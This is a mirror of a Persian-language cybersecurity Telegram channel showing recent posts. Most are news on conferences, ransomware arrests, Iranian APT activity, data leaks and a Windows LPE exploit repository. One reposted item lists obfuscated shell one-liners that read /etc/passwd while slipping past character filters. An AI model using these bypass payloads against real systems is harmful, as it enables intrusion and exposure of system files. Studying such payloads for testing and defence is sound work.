OnHex


Kanal geosi va tili: Eron, Forscha


#امنیت_سایبری #مهندسی_معکوس #توسعه_اکسپلویت #باگ_بانتی
#Cybersecurity #infosec #ReverseEngineering #ExploitDev #Redteam #bugbounty #OffensiveSecurity #crypto
دونیت و شبکه های اجتماعی:
https://zil.ink/onhexgroup
@seyyidy
تبلیغات و تبادل:
@onhex_ir_ADS

Связанные каналы  |  Похожие каналы

Kanal geosi va tili
Eron, Forscha
Statistika
Postlar filtri


RedTeam dan repost
cat ${HOME:0:1}etc${HOME:0:1}passwd

echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat xxd -r -ps






..: لیک‌فا | Leakfa :.. dan repost
نقض جدید: مجموعه‌ بزرگی حاوی بیش از 50 هزار خط نام، نام خانوادگی، نام پدر، شماره ملی، جنسیت، تاریخ تولد، آدرس یا نشانی، رشته تحصیلی، مدرک تحصیلی، آدرس ایمیل، کلمه عبور، شماره تلفن همراه، کد پرسنلی، موقعیت شغلی و اطلاعات دیگری از دانشجویان، اساتید و کارکنان "دانشگاه آزاد اسلامی واحد نجف آباد" در لیست فروشندگان بانک اطلاعاتی مشاهده شده است.

✅ صحت داده‌های نمونه بررسی شده و قابل تایید است!

🆔 @leakfarsi


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
🔴 آقای STÖK توییتی رو منتشر کردن حاوی ویدیویی که در اون گفتن اگه به باگ بانتی علاقمندید و تردید دارید که هوش مصنوعی اومده یا محققای زیادی در این حوزه فعالیت دارن و بنابراین اینجا جای شما نیست، اشتباه فکر میکنید.


باگها وجود دارن و فقط کافیه یکمی کنجکاوتر باشید و عمیقتر بررسی کنید تا اونارو پیدا کنید. چیزایی که مردم میگن رو باور نکنید، حتی چیزایی که من میگم. کل قضیه اینه که اونارو خودتون پیدا کنید. همین امروز باگ بانتی رو شروع کنید.

#انگیزشی #باگ_بانتی
#bugbounty

🆔 @onhex_ir
➡️ ALL Link


🔴 ارسال مقاله به کنفرانس Typhooncon 2025 باز شده.

کنفرانس Typhooncon یک کنفرانس امنیت سایبری هستش که روی امنیت تهاجمی مثله توسعه اکسپلویت، تحقیقات آسیب پذیری، مهندسی معکوس و ... تمرکز داره.

- کنفرانس 29-30 مه| 8 و 9 خرداد 1404 در سئول برگزار میشه.
- ارسال مقاله تا 1 مارس | 11 اسفند 1403 فراهم هستش.


در کنار کنفرانس دوره آموزشی هم برگزار میشه. اگه تمایل به برگزاری آموزش هم بودید باز میتونید درخواست بدید.

- دوره ها از 26 تا 28 مه 2025 | 5 تا 7 خرداد 1404 برگزار میشه.
- تا یک فوریه| 13 بهمن هم فرصت ارسال درخواست برای برگزاری دوره دارید.

برای ارائه دهندگان یسری مزایا هم در نظر گرفتن از جمله هتل و هزینه رفت و برگشت و ... .

علاوه بر کنفرانس و دوره، مسابقات TyphoonPWN 2025 هم برگزار میشه. این مسابقات مثله #PWN2OWN هستش و هکرها بصورت لایو، روی تارگتها کار میکنن تا اونارو هک کنن. فعلا اهداف زیر رو معرفی کردن:

- MS Windows Privilege Escalation – Up to $70,000 USD
- Linux Privilege Escalation – Up to $70,000 USD
- Microsoft Exchange Server RCE – Up to $80,000 USD
- Kerio Control PreAuth RCE – Up to $50,000 USD
- Sophos Firewall PreAuth RCE – Up to $50,000 USD
- Google Chrome RCE – Up to $130,000 USD
- Google Chrome RCE & Sandbox Escape – Up to $250,000 USD
- FRITZ!Box PreAuth RCE – Up to $30,000 USD
- HP MFP 4303DW/FDW PRINTERS PreAuth RCE – Up to $20,000 USD
- ipTime Router WAN PreAuth RCE

برای کسب اطلاعات بیشتر از سایتشون بازدید کنید.

#کنفرانس
#typhooncon2025

🆔 @onhex_ir
➡️ ALL Link


🔴 ده روز دیگه، 29 نوامبر، 9 آذر Black Friday هستش و در این روز معمولا شرکتها و فروشندگان، تخفیفهایی رو روی اجناسشون اعمال میکنن.

ما که داخل ایران هستیم، معمولا نمیتونیم اجناس فیزیکی مثله کنسول و کامپیوتر و ... بخریم، ولی امکان خرید محصولات دیجیتال مثله دوره، کتاب، لایسنس و ... فراهم هستش.

در خصوص محصولات مرتبط با امنیت سایبری، به روال هر سال، این مخزن گیتهاب، تخفیفهای مختلف رو جمع آوری و لیست میکنه، که اگه علاقمند بودید قبل از خرید بررسیش کنید. (سرویس، دوره، ابزار، امتحانات و VPN و ... )

علاوه بر این مخزن، معمولا در توییتر و ردیت هم تخفیفهایی منتشر میشه، که میتونید با هشتگ بلک فرایدی یا Black Friday بهشون دسترسی داشته باشید.

فقط بازار کلاهبرداری هم معمولا زیاد میشه که مراقب این موارد هم باشید. همچنین قبل خرید شرایط تخفیف رو هم بررسی کنید که محصولات محدود یا به درد نخور رو به بهانه تخفیف نخرید.

دوشنبه بعد از بلک فرایدی هم Cyber Monday هستش که امسال 2 دسامبر، 12 آذر هستش که در این روز هم باز تخفیفاتی برای محصولات دیجیتالی و سایبری ارائه میشه.

اگه مورد خرید داشته باشید، از این تخفیفات استفاده کنید. برای ما که باید Very Very Very Very Very Black Friday باشه که بتونیم خرید کنیم.

#بلک_فرایدی #سایبرماندی
#CyberMonday #BlackFriday

🆔 @onhex_ir
➡️ ALL Link


PagedOut_005.pdf
23.4Mb
🔴 نسخه ی پنجم نشریه ی Paged Out منتشر شد.

موضوعاتی که این نشریه پوشش میده: الگوریتم، هوش مصنوعی، سخت افزار، مهندسی معکوس، هک و امنیت، اینترنالز سیستم عامل، بازی، رمزنگاری و ... هستش.

دانلود از سایتشون

#نشریه #PagedOut

🆔 @onhex_ir
➡️ ALL Link


🔴 یک تبعه 42 ساله روسی بنام Evgenii Ptitsyn اخیرا در کره جنوبی دستگیر شده که مظنون به ادمین باج افزار Phobos هستش. کره جنوبی ایشون رو تحویل آمریکا داده تا به جرمهاش رسیدگی بشه.

فوبوس یکی از باج افزارهای قدیمی هستش که بصورت RaaS فعالیت میکنه و از باج افزار Crysis گرفته شده. خیلی از افیلیتها هم از این باج افزار برای هدف قرار دادن سازمانها و شرکتها استفاده میکنن. در ایران هم قربانی داشته.

وزارت دادگستری آمریکا، این باند رو متهم کرده که به بیش از 1000 سازمان دولتی و خصوصی در آمریکا و دنیا حمله کرده و بیش از 16 میلیون دلار باج گرفتن.

طبق اسناد دادگاه، Ptitsyn و همدستاش از نوامبر 2020 شروع به توسعه و توزیع این باج افزار کردن.

برای تبلیغ از فرومها و سایتهایی دارک وبی استفاده کردن. در این سایتها Ptitsyn با نام های کاربری derxan و zimmermanx استفاده کرده.

روش کار هم اینجوری بوده که افیلیتها، سازمانها رو آلوده میکردن و طلب باج میکردن. اگه سازمانی باج رو پرداخت میکرد، افیلیتها برای دریافت کلید رمزگشا به Ptitsyn و ادمینها مراجعه میکردن و هزینه کلید رو پرداخت میکردن.

از دسامبر 2021 تا آوریل 2024، همه ی واریزیها برای دریافت کلید رمزگشا به کیف پولی بوده که ظاهرا تحت کنترل Ptitsyn بوده.

فعلا ایشون به 13 جرم متهم شدن که اگه همه اشون تایید بشن، حداکثر 20 سال برای کلاهبرداری اینترنتی، برای هر فقره هک 10 سال و 5 سال هم برای همدستی ، زندان دارن. البته اگه همکاری کنه، مثلا لیست افیلیتها و ... رو اعلام کنه، احتمالا چند سالی رو تخفیف میدن. / منبع

#بازیگران_تهدید #فوبوس #باج_افزار
#Phobos #ransomware

🆔 @onhex_ir
➡️ ALL Link


🔴 معمولا وقتی میخواییم یک تکنیک یا مقاله ای رو بررسی کنیم، بالا آوردن یک محیط تست سختی های خودش داره. کلی ابزار باید دانلود و کانفیگ کنیم تا مثلا بتونیم یک زیر ساخت تست رو فراهم کنیم.

برای همینه که ما #وردپرس_آسیب_پذیر رو منتشر میکنیم.

برای حل این مشکل میتونید از ludus استفاده کنید. به کمک این ابزار میتونید فقط با یک دستور، محیط تست برای تیم قرمز، تیم آبی و ... ایجاد کنید.

تقریبا محیطی مثل تصویر ضمیمه شده رو براتون میسازه. قطعا نیاز به منابع زیادی داره. برای کسب اطلاعات بیشتر و مستندات پروژه میتونید از سایتشون دیدن کنید.

#تیم_قرمز #تیم_آبی
#redteam #blueteam

🆔 @onhex_ir
➡️ ALL Link


🔴 اگه برای فرایند مهندسی معکوس از پلتفرم radare استفاده میکنید، این کمپانی یک کنفرانسی هم برگزار میکنه با عنوان r2con، که تمرکزش روی استفاده از radare در دنیای واقعی هستش. مثلا در بخش آموزش، امسال، اسکریپت نویسی در radare و آنالیز بدافزار با radare رو آموزش دادن.

بخشی از آموزشهای کنفرانس امسال منتشر شده، که اگه علاقمند بودید، میتونید ازش استفاده کنید.

#کنفرانس #مهندسی_معکوس
#radar #r2con2024

🆔 @onhex_ir
➡️ ALL Link


🔴 اسلاید ارائه های کنفرانس POC2024 منتشر شد

این کنفرانس امنیت سایبری و هک از سال 2006 توسط محققین کره جنوبی راه اندازی شده. POC هم مخفف Power of Community .

کنفرانس بیشتر روی تحقیقات آسیب پذیری و توسعه ی اکسپلویت متمرکز هستش.

#کنفرانس
#POC

🆔 @onhex_ir
➡️ ALL Link


🔴 در این مخزن گیتهاب، اکسپلویتهای LPE برای ویندوز از سال 2023 تا 2024 جمع آوری و لیست شده.

اگه در فرایند یادگیری اکسپلویت نویسی یا ردتیم، نیاز به این نوع اکسپلویتها داشتید، میتونید با دونستن CVE و این لیست، اکسپلویت مربوطه رو بدست بیارید.

⚠️ چند تارو من بررسی کردم از گیتهاب جمع آوری شدن، بنابراین قبل از مصرف تکان دهید.

#تیم_قرمز #اکسپلویت_نویسی #ویندوز
#redteam #exploitdev

🆔 @onhex_ir
➡️ ALL Link


🔴 ویدیوهای کنفرانس BlueHat 2024 که یک کنفرانس در حوزه ی امنیت سایبری هستش و توسط مایکروسافت برگزار میشه، در یوتیوب منتشر شد.

#کنفرانس
#BlueHat2024

🆔 @onhex_ir
➡️ ALL Link
BlueHat 2024
BlueHat 2024 - Oct 29-30, 2024. Redmond, WA USA


🔴 مهمان اپیزود ششم رادیو باگفادر (BugFather) ، آقای رضا ضمیری هستن.

تو این قسمت عجیب و جذاب میزبان مهندس رضا ضمیری متخصص امنیت محصول در آلمان بودیم و درمورد اینکه چطور میتونیم به حوزه سایبرسکوریتی وارد شیم و همینطور چه تهدیداتی نرم افزارهامونو ممکنه تهدید کنه صحبت کردیم.

صحبتامون از تاثیر هوش مصنوعی تو حوزه هک و امنیت، نحوه تقابل با هک شدن تو ایران و خارج تا ده ها چیز دیگه مثل خودروهای تسلا و اینکه چطور نرم افزارمونو امن نگه داریم کشیده شده. باهامون تو این سه ساعت همراه باشید.


#پادکست #باگفادر
#bugfather

🆔 @onhex_ir
➡️ ALL Link
نگهبانان نرم افزار | رضا ضمیری
#رادیوباگفادر شماره 6 🦔 این قسمت "نگهبانان نرم افزار، فانتزی تا واقعیت"⭐️ تو این ق...


🔴 ارائه های کنفرانس امنیت سایبری VooriCon از امشب شروع میشه.

احتمالا از این کانال یوتیوب

#کنفرانس
#VooriCon

🆔 @onhex_ir
➡️ ALL Link


🔴 بررسی Patch Tuesday مایکروسافت برای نوامبر 2024 (آبان 1403)

مایکروسافت Patch Tuesday خودش رو برای نوامبر 2024 با اصلاح 92 آسیب پذیری منتشر کرده، که 6 موردش زیرودی هستن.

#آسیب_پذیری_امنیتی #مایکروسافت #0day #PatchTuesday

🆔 @onhex_ir
➡️ ALL Link


🔴 روزنامه ی اسرائیلی هاآرتص گزارشی منتشر کرده در خصوص هک اطلاعات شخصی یک دانشمند هسته‌ای و همکاراش.

این گروه که احتمالا حنظله هستش و مرتبط به ایران میدونن، اطلاعات شخصی یک دانشمند هسته‌ای که در مرکز تحقیقات هسته‌ای "سورک" کار میکرد رو افشا کرده. این گروه عکسهایی رو منتشر کرده که ادعا شده در سورک گرفته شدن و همچنین تصاویری از نامهای سایر دانشمندان هسته‌ای که در پروژه شتاب‌ دهنده ذرات این مرکز دخیل بودن، ارائه دادن.

همزمان، این هکرها ادعا کردن که به حساب شخصی یک مدیرکل سابق وزارت دفاع اسرائیل نفوذ کرده و عکسها و اسناد شخصیش رو منتشر کردن. همچنین، اطلاعات شخصی مربوط به یک سفیر فعلی اسرائیل و یک وابسته نظامی سابق اسرائیل در آمریکا و اطلاعاتی درباره اعضای خانواده مقامات ارشد اسرائیلی رو به بیرون درز دادن.

در ماه مارس سال جاری، این گروه مدعی شد که اطلاعاتی رو از مرکز تحقیقات هسته‌ای "نقب" در دیمونا از طریق نفوذ به سرورهای ایمیل دولتی، از جمله سرورهای کمیسیون انرژی اتمی اسرائیل، به دست آورده. هفته گذشته نیز تقریباً ۳۰ تصویر ادعایی از سورک منتشر کردن، اما بررسی دقیق نشون میده که این تصاویر در واقع از سورک یا دیمونا گرفته نشدن. این تصاویر به نظر میرسه از گوشی یا حساب ایمیل این دانشمند هسته‌ای بدست اومده و به فعالیتهای اون به عنوان کارشناس ایمنی اشعه مربوط میشن. هکرها همچنین عکس پاسپورت این دانشمند رو منتشر کردن.

مواد منتشر شده شامل چندین تصویر از سیستمهای کامپیوتری بودن که به نظر میرسه از پروژه شتاب‌ دهنده ذرات SARAF گرفته شدن و نامهای اضافی از دانشمندان هسته‌ای رو نشون میدن. در حالیکه هکرها تلاش کردن تا تاریخها رو در برخی اسناد پنهان کنن، اما متوجه تاریخهای عبری در برخی از اونا نشدن که نشون میده این تصاویر مربوط به سالهای ۲۰۱۴ و ۲۰۱۵ است.

در این رابطه کمیسیون انرژی اتمی اسرائیل اظهار داشته که هیچ‌ یک از تصاویر فاش شده از تأسیسات هسته‌ای اسرائیل بدست نیومدن. اداره ملی سایبری از اظهار نظر خودداری کرده و سوالات رو به دفتر نخست‌وزیری ارجاع داده. سرویس امنیتی "شاباک" اسرائیل هم پاسخی ارائه نکرده.

به گزارش هاآرتص، دفتر نخست‌وزیری به نمایندگی از کمیسیون انرژی اتمی اسرائیل در بیانیه‌ای اعلام کرد: پس از بررسی دقیق، مشخص شد که تصاویر و نقشه‌ها به هیچ یک از تأسیسات ما تعلق ندارن. درباره اسکرین‌ شاتها، کمیسیون اظهار داشته که اونا شامل مواد فنی مرتبط با پروژه ساخت شتاب‌دهنده ذرات در مرکز تحقیقات هسته‌ای سورک بودن.

گزارش هاآرتص می‌افزاید: هکرهای ایرانی همچنین عکسها و اسناد شخصی ادعایی رو که از نفوذ به حسابهای چندین مقام ارشد اسرائیلی بدست آوردن رو منتشر کردن. از جمله اهداف، یک سرلشکر سابق بود که پیشتر رئیس عملیات سایبری نظامی اسرائیل و بعدش مدیرکل وزارت دفاع بوده. هکرها عکس پاسپورتش رو منتشر کردن و تهدید به انتشار کامل اسناد دیگه در آینده کردن.

این هکرها بطور سیستماتیک اطلاعات حساس شخصی درباره مقامات دفاعی و دولتی فعلی و سابق اسرائیل رو طی چندین ماه افشا کردن. به گفته اونا، این اطلاعات رو از طریق نفوذ به حسابهای ایمیل بدست آوردن و ایمیلهای دو مقام ارشد سابق و دو مقام فعلی رو به نمایش گذاشتن، که در یکی از این افشاگریها، لیست تماس کامل یک مقام نشون داده شده.

از اکتبر گذشته، اسرائیل با افزایش بی‌سابقه حملات سایبری در سطوح مختلف روبه‌رو شده. در ماههای اخیر، داده‌های به سرقت رفته از وزارت دادگستری، وزارت دفاع، مراکز تحقیقات هسته‌ای، موسسه بیمه ملی و دیگر نهادهای دولتی اسرائیل به طور گسترده توزیع شده.

منابع متعدد به هاآرتص تأیید کردن که اسرائیل تلاشهای گسترده‌ای رو برای یافتن و حذف داده‌ها و مدارک به سرقت‌رفته از طریق کانالهای قانونی و درخواستهای مستقیم از شرکتهای فناوری، پلتفرمهای شبکه‌های اجتماعی و سرویسهای پیام‌رسان انجام میده. گاهی اوقات این تلاش‌ها موفقیت‌آمیز هستند، اما در بیشتر مواقع، این کار تقریباً بی‌نتیجه است و امکان حذف کامل اطلاعات تقریباً غیرممکنه.

به گزارش هاآرتص، گروههای هکری دیگه، یک وب‌سایت مبتنی بر بلاک‌چین برای انتشار افشاگریها از پایگاه‌های داده حساس اسرائیل ایجاد کردن. هزاران سند تاکنون در این پلتفرم منتشر شده که به دلیل فناوری غیرمتمرکزش، نمیشه اونارو از اینترنت حذف کرد. / منبع

#هکرهای_ایرانی #حنظله
#handala #APT

🆔 @onhex_ir
➡️ ALL Link




🔴 کمپانی ESET گزارشی در خصوص فعالیت APTها در سه ماهه دوم و سوم سال 2024 منتشر کرده.

این گزارش بطور کلی در خصوص ایران، روسیه، چین و کره شمالی هستش.

در خصوص ایران به موارد زیر اشاره شده:

- گروه MuddyWater ، تغییراتی رو در فرایند حرکات جانبی و فعالیتهایی که بصورت مستقیم با هدف درگیر میشن، دادن. این امر نشون دهنده تغییر جالب درTTP اوناست که معمولا روی سرقت اعتبارنامه ها یا حفظ دسترسی به یک سیستم خاص بوده.

- در چندین مورد، مشاهده شده که MuddyWater از اشتراکهای داخلی شبکه به عنوان مکانهای میانی برای C2 استفاده کردن. اپراتورهای MuddyWater، اغلب از طریق دسترسی خط فرمان به سیستمها، ریکان و جمع آوری اعتبارنامه‌ها، اونارو به این C2های میانی منتقل میکنن و بعدش اونارو استخراج میکنن.

- در یک مورد قابل توجه، اپراتورهای MuddyWater به مدت ۱۳ ساعت با استفاده از ابزارهای مختلفی (مانند MirrorDump، ProcDump، PowerSploit و Impersonate) سعی در استخراج حافظه فرآیند LSASS داشتن، اما ظاهراً موفقیتی حاصل نشد. این تغییر به حرکت جانبی احتمالاً نشون‌ دهنده‌ی درک بهتر تواناییهای دفاعی شبکه و بلوغ در قابلیتهای تهاجمی سایبری هستش.

- اهدافی که روشون کار کردن از کنیا، غنا، زامبیا و اسرائیل بوده.

- زیرگروه OilRig با نام BladedFeline جاسوسی سایبری علیه همسایگان ایران از جمله عراق و آذربایجان رو با نرخ بالایی از توسعه و استقرار بدافزار انجام داده. بدافزارهاشون Whisper, Spearal, Optimizer

- گروه Ballistic Bobcat که با نام APT35 شناخته میشه و با APT42 همپوشانی داره، اهدافی رو در فرانسه و آمریکا هدف قرار داده. تکنیکشون هم اغلب تزریق کد به پروسسها و دور زدن محصولات امنیتی از جمله EDRها بوده.

#هکرهای_ایرانی
#APT #ESET

🆔 @onhex_ir
➡️ ALL Link

20 ta oxirgi post ko‘rsatilgan.